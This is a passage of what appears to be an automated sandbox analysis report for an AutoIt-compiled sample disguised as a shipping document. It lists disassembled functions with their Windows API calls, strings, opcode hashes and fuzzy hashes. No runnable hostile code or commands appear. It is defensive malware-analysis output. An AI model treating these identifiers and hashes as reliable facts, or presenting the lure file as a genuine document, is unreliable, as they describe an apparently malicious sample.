                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: 4a87bcdfc0e21798d9d43883aecf31d16a126477e64202e07ee679e807dac1a1
                    • Instruction ID: 8d96868081f19079e3498dfbbc9ff0ce749f77170cc13ebc0e13ebcf71cbdf4d
                    • Opcode Fuzzy Hash: 4a87bcdfc0e21798d9d43883aecf31d16a126477e64202e07ee679e807dac1a1
                    • Instruction Fuzzy Hash: E0D192702042119BCB14FF24C492AAAB7E5AF95744F146958F88E7B3E3DB31DE4ACB41
                    Function 00E8A60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00E8A662
                    • GetSysColorBrush.USER32(0000000F), ref: 00E8A693
                    • GetSysColor.USER32(0000000F), ref: 00E8A69F
                    • SetBkColor.GDI32(?,000000FF), ref: 00E8A6B9
                    • SelectObject.GDI32(?,00000000), ref: 00E8A6C8
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A6F3
                    • GetSysColor.USER32(00000010), ref: 00E8A6FB
                    • CreateSolidBrush.GDI32(00000000), ref: 00E8A702
                    • FrameRect.USER32(?,?,00000000), ref: 00E8A711
                    • DeleteObject.GDI32(00000000), ref: 00E8A718
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00E8A763
                    • FillRect.USER32(?,?,00000000), ref: 00E8A795
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8A7C0
                      • Part of subcall function 00E8A8FC: GetSysColor.USER32(00000012), ref: 00E8A935
                      • Part of subcall function 00E8A8FC: SetTextColor.GDI32(?,?), ref: 00E8A939
                      • Part of subcall function 00E8A8FC: GetSysColorBrush.USER32(0000000F), ref: 00E8A94F
                      • Part of subcall function 00E8A8FC: GetSysColor.USER32(0000000F), ref: 00E8A95A
                      • Part of subcall function 00E8A8FC: GetSysColor.USER32(00000011), ref: 00E8A977
                      • Part of subcall function 00E8A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A985
                      • Part of subcall function 00E8A8FC: SelectObject.GDI32(?,00000000), ref: 00E8A996
                      • Part of subcall function 00E8A8FC: SetBkColor.GDI32(?,00000000), ref: 00E8A99F
                      • Part of subcall function 00E8A8FC: SelectObject.GDI32(?,?), ref: 00E8A9AC
                      • Part of subcall function 00E8A8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A9CB
                      • Part of subcall function 00E8A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9E2
                      • Part of subcall function 00E8A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9F7
                      • Part of subcall function 00E8A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8AA1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    • String ID:
                    • API String ID: 3521893082-0
                    • Opcode ID: d75ea2258fe8fe0aa4cf49c2e3956e0bc91614427172033540772b59b951036d
                    • Instruction ID: a07fc10d971d0ef22905aff0c6ead338264e4e4ca838870d8ac7de6083f4f730
                    • Opcode Fuzzy Hash: d75ea2258fe8fe0aa4cf49c2e3956e0bc91614427172033540772b59b951036d
                    • Instruction Fuzzy Hash: 88919F72008301EFDB10AF65DC08E5B7BA9FF88321F141B2AF56AB61A1D731D848DB52
                    Function 00E02C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00E02CA2
                    • DeleteObject.GDI32(00000000), ref: 00E02CE8
                    • DeleteObject.GDI32(00000000), ref: 00E02CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00E02CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00E02D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E3C5BB
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E3C5F4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E3CA1D
                      • Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A
                    • SendMessageW.USER32(?,00001053), ref: 00E3CA5A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E3CA71
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3CA87
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3CA92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: 075c6d6a4236b155e1ed6fc4fee57ec47ba863c7c5cbace1f14f3024002f5e8f
                    • Instruction ID: 02c48be87f6d9ca679a2b6fedd0b1463bba4a87e96064b39222aa71f91640858
                    • Opcode Fuzzy Hash: 075c6d6a4236b155e1ed6fc4fee57ec47ba863c7c5cbace1f14f3024002f5e8f
                    • Instruction Fuzzy Hash: 79127031600201EFDB15CF24C88CBA9BBE5BF45308F646569E999FB2A2C731EC85DB51
                    Function 00E775C0 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00E775F3
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E776B2
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E776F0
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E77702
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E77748
                    • GetClientRect.USER32(00000000,?), ref: 00E77754
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E77798
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E777A7
                    • GetStockObject.GDI32(00000011), ref: 00E777B7
                    • SelectObject.GDI32(00000000,00000000), ref: 00E777BB
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E777CB
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E777D4
                    • DeleteDC.GDI32(00000000), ref: 00E777DD
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E77809
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E77820
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E7785B
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E7786F
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E77880
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E778B0
                    • GetStockObject.GDI32(00000011), ref: 00E778BB
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E778C6
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E778D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: a3de261487a2dccd3c9893609f1ad5b8b04e1f1a55d7e3bb0c1c7143a8eb7a1a
                    • Instruction ID: 4946e5272a622b90f8961e63d3238b95375ca3d7a1f079e01496e1a9e9a63747
                    • Opcode Fuzzy Hash: a3de261487a2dccd3c9893609f1ad5b8b04e1f1a55d7e3bb0c1c7143a8eb7a1a
                    • Instruction Fuzzy Hash: 59A17F71A40605BFEB149BA5DC4AFAE7BB9EB44710F008124FA19B72E1C771AD45CB60
                    Function 00E6AD9C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6ADAA
                    • GetDriveTypeW.KERNEL32(?,00E8FAC0,?,\\.\,00E8F910), ref: 00E6AE87
                    • SetErrorMode.KERNEL32(00000000,00E8FAC0,?,\\.\,00E8F910), ref: 00E6AFE5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: f163bab04ac6c588e8f831e83539345fade197315a278abf8fc0a0b1a842d694
                    • Instruction ID: 69ba88c7a3bcd1e993a13c93478aa1a3b13446759c6f4a1c7a8110c169d0727d
                    • Opcode Fuzzy Hash: f163bab04ac6c588e8f831e83539345fade197315a278abf8fc0a0b1a842d694
                    • Instruction Fuzzy Hash: 5B5183B4B843059ACB04EB20EAD28FAB3B4AB543847287476E906B7291CF319D41DF53
                    Function 00E06A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 4aa4c992842c4015ee7132de4535c55f8f2cb5d9705e9e0533c40888dde1f549
                    • Instruction ID: b1e2f572289561cadd3521e53c51dfe849cd421a001d1d7b39cd76a407064d4b
                    • Opcode Fuzzy Hash: 4aa4c992842c4015ee7132de4535c55f8f2cb5d9705e9e0533c40888dde1f549
                    • Instruction Fuzzy Hash: 20810871740316BACB20BF60DC87FEE77A8AF15704F047025F945BA1D6EB60DA91CA91
                    Function 00E8A8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00E8A935
                    • SetTextColor.GDI32(?,?), ref: 00E8A939
                    • GetSysColorBrush.USER32(0000000F), ref: 00E8A94F
                    • GetSysColor.USER32(0000000F), ref: 00E8A95A
                    • CreateSolidBrush.GDI32(?), ref: 00E8A95F
                    • GetSysColor.USER32(00000011), ref: 00E8A977
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A985
                    • SelectObject.GDI32(?,00000000), ref: 00E8A996
                    • SetBkColor.GDI32(?,00000000), ref: 00E8A99F
                    • SelectObject.GDI32(?,?), ref: 00E8A9AC
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A9CB
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9E2
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9F7
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8AA1F
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E8AA46
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00E8AA64
                    • DrawFocusRect.USER32(?,?), ref: 00E8AA6F
                    • GetSysColor.USER32(00000011), ref: 00E8AA7D
                    • SetTextColor.GDI32(?,00000000), ref: 00E8AA85
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E8AA99
                    • SelectObject.GDI32(?,00E8A62C), ref: 00E8AAB0
                    • DeleteObject.GDI32(?), ref: 00E8AABB
                    • SelectObject.GDI32(?,?), ref: 00E8AAC1
                    • DeleteObject.GDI32(?), ref: 00E8AAC6
                    • SetTextColor.GDI32(?,?), ref: 00E8AACC
                    • SetBkColor.GDI32(?,?), ref: 00E8AAD6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: afdf55e521be0e37c6b6bf84fb5b86e91e1c78896f45b1d0d4aa2f0683c4bcab
                    • Instruction ID: a505b655f8c4e4c9cb57c6e4ab0a76cbb8c64000de129016aa2262c37cd11bab
                    • Opcode Fuzzy Hash: afdf55e521be0e37c6b6bf84fb5b86e91e1c78896f45b1d0d4aa2f0683c4bcab
                    • Instruction Fuzzy Hash: 40515D71901208FFDF109FA5DC48EAE7BB9EB48320F254226F919BB2A1D7719940DF90
                    Function 00E88A07 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E88AF3
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88B04
                    • CharNextW.USER32(0000014E), ref: 00E88B33
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E88B74
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E88B8A
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88B9B
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E88BB8
                    • SetWindowTextW.USER32(?,0000014E), ref: 00E88C0A
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E88C20
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E88C51
                    • _memset.LIBCMT ref: 00E88C76
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E88CBF
                    • _memset.LIBCMT ref: 00E88D1E
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E88D48
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E88DA0
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00E88E4D
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00E88E6F
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88EB9
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88EE6
                    • DrawMenuBar.USER32(?), ref: 00E88EF5
                    • SetWindowTextW.USER32(?,0000014E), ref: 00E88F1D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 2dcd33b51250075a831625fdf6532b2089250e812a587fbd0ecfb3035746664d
                    • Instruction ID: d8d1a4db96d794c7b95750518ba19e3da3348da91b71c5be2be560bf94ddc149
                    • Opcode Fuzzy Hash: 2dcd33b51250075a831625fdf6532b2089250e812a587fbd0ecfb3035746664d
                    • Instruction Fuzzy Hash: 90E19F71900208AFDB20AF51CD84EEE7BB9EF04754F50915AFE1DBA2A0DB709985DF60
                    Function 00E848F8 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E84A33
                    • GetDesktopWindow.USER32 ref: 00E84A48
                    • GetWindowRect.USER32(00000000), ref: 00E84A4F
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E84AB1
                    • DestroyWindow.USER32(?), ref: 00E84ADD
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E84B06
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E84B24
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E84B4A
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00E84B5F
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E84B72
                    • IsWindowVisible.USER32(?), ref: 00E84B92
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E84BAD
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E84BC1
                    • GetWindowRect.USER32(?,?), ref: 00E84BD9
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00E84BFF
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00E84C19
                    • CopyRect.USER32(?,?), ref: 00E84C30
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00E84C9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 0f9066d6fc39eb1ccb990dbf6cffe973e00c98db040e32a0557292a2fd7e1fae
                    • Instruction ID: a5961c3496aca342b1333ecb21f2b3cde5789ebcf170619ca595eb558c27f6f7
                    • Opcode Fuzzy Hash: 0f9066d6fc39eb1ccb990dbf6cffe973e00c98db040e32a0557292a2fd7e1fae
                    • Instruction Fuzzy Hash: 83B16CB1604342AFDB04EF65C888B6ABBE4FF84314F00991DF59DAB292D771D844CB95
                    Function 00E027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028BC
                    • GetSystemMetrics.USER32(00000007), ref: 00E028C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028EF
                    • GetSystemMetrics.USER32(00000008), ref: 00E028F7
                    • GetSystemMetrics.USER32(00000004), ref: 00E0291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E02939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E02949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E0297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E02990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00E029AE
                    • GetStockObject.GDI32(00000011), ref: 00E029CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E029D5
                      • Part of subcall function 00E02344: GetCursorPos.USER32(?), ref: 00E02357
                      • Part of subcall function 00E02344: ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                      • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000001), ref: 00E02399
                      • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                    • SetTimer.USER32(00000000,00000000,00000028,00E01256), ref: 00E029FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 30ab825195b3b497055b80915583be952df096e165a7406f8753c088cd9e7611
                    • Instruction ID: 85105967ec72dcaeed0ffece7ca6d1b209bfe8c88e9f1673eb174fb2cf0caa23
                    • Opcode Fuzzy Hash: 30ab825195b3b497055b80915583be952df096e165a7406f8753c088cd9e7611
                    • Instruction Fuzzy Hash: 9BB17F71A0020ADFDB14DFA9DC49BAE7BB4FB48314F105129FA15B62E0DB70E895CB50
                    Function 00E5A844 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00E5A885
                    • __swprintf.LIBCMT ref: 00E5A926
                    • _wcscmp.LIBCMT ref: 00E5A939
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E5A98E
                    • _wcscmp.LIBCMT ref: 00E5A9CA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00E5AA01
                    • GetDlgCtrlID.USER32(?), ref: 00E5AA53
                    • GetWindowRect.USER32(?,?), ref: 00E5AA89
                    • GetParent.USER32(?), ref: 00E5AAA7
                    • ScreenToClient.USER32(00000000), ref: 00E5AAAE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00E5AB28
                    • _wcscmp.LIBCMT ref: 00E5AB3C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00E5AB62
                    • _wcscmp.LIBCMT ref: 00E5AB76
                      • Part of subcall function 00E237AC: _iswctype.LIBCMT ref: 00E237B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 46d3cddd9af875ccc777a22fbce9475fede24861a258d34d6796014891e4deaf
                    • Instruction ID: ddebd14715351abaa8d073f8ac9f315f1af32f76c5082a34297be8be3345146f
                    • Opcode Fuzzy Hash: 46d3cddd9af875ccc777a22fbce9475fede24861a258d34d6796014891e4deaf
